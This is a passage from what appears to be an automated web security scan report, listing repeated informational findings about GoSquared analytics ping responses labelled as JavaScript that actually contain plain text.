User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:47:11 GMT
Expires: Tue, 05 Apr 2011 11:47:11
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.18. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.10315419943071902/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:56:02 GMT
Expires: Tue, 05 Apr 2011 11:56:02
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.19. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.11289626965299249/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:51:53 GMT
Expires: Tue, 05 Apr 2011 11:51:53
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.20. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.11589423776604235/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:31:42 GMT
Expires: Tue, 05 Apr 2011 11:31:42
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.21. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.12988923490047455/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:43:52 GMT
Expires: Tue, 05 Apr 2011 11:43:52
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.22. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.13738619000650942/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:51:36 GMT
Expires: Tue, 05 Apr 2011 11:51:36
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.23. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.138584119733423/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:33:37 GMT
Expires: Tue, 05 Apr 2011 11:33:37
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.24. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.1699286277871579/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:59:06 GMT
Expires: Tue, 05 Apr 2011 11:59:06
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.25. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.17060571792535484/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:56:53 GMT
Expires: Tue, 05 Apr 2011 11:56:53
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.26. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.17085690842941403/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:49:41 GMT
Expires: Tue, 05 Apr 2011 11:49:41
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.27. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.17398039577528834/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:55:29 GMT
Expires: Tue, 05 Apr 2011 11:55:29
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.28. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.1774560243356973/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:33:55 GMT
Expires: Tue, 05 Apr 2011 11:33:55
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.29. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.18011080077849329/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:39:26 GMT
Expires: Tue, 05 Apr 2011 11:39:26
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.30. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.18388619902543724/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:27:16 GMT
Expires: Tue, 05 Apr 2011 11:27:16
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.31. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.1858982944395393/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:37:14 GMT
Expires: Tue, 05 Apr 2011 11:37:14
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.32. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.19640426943078637/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:27:49 GMT
Expires: Tue, 05 Apr 2011 11:27:49
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.33. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.19923278456553817/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:35:17 GMT
Expires: Tue, 05 Apr 2011 11:35:17
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.34. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.20630339859053493/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:58:49 GMT
Expires: Tue, 05 Apr 2011 11:58:48
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.35. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.24649194884113967/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:50:47 GMT
Expires: Tue, 05 Apr 2011 11:50:47
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.36. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.2514170885551721/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:38:53 GMT
Expires: Tue, 05 Apr 2011 11:38:53
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.37. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.2516566349659115/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:44:58 GMT
Expires: Tue, 05 Apr 2011 11:44:58
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.38. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.2637447805609554/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:30:51 GMT
Expires: Tue, 05 Apr 2011 11:30:51
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.39. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.28566303313709795/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:48:35 GMT
Expires: Tue, 05 Apr 2011 11:48:35
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.40. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.2876860585529357/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:30:18 GMT
Expires: Tue, 05 Apr 2011 11:30:18
Server: nginx/0.8.54
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.41. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.3019666268955916/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Sat, 30 Apr 2011 11:32:15 GMT
Expires: Tue, 05 Apr 2011 11:32:15
Server: nginx/0.8.54
Connection: keep-alive
Content-Length: 48

GoSquared.nextPing=15;GoSquared.pingSuccess=true

30.42. http://data.gosquared.com/ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://data.gosquared.com
Path:   /ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /ping/GSN-237422-W/1496610374/1445638221/0.30537568125873804/blur HTTP/1.1
Host: data.gosquared.com
Proxy-Connection: keep-alive
Referer: http://www.mo.gov/living-in-missouri/childrens-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
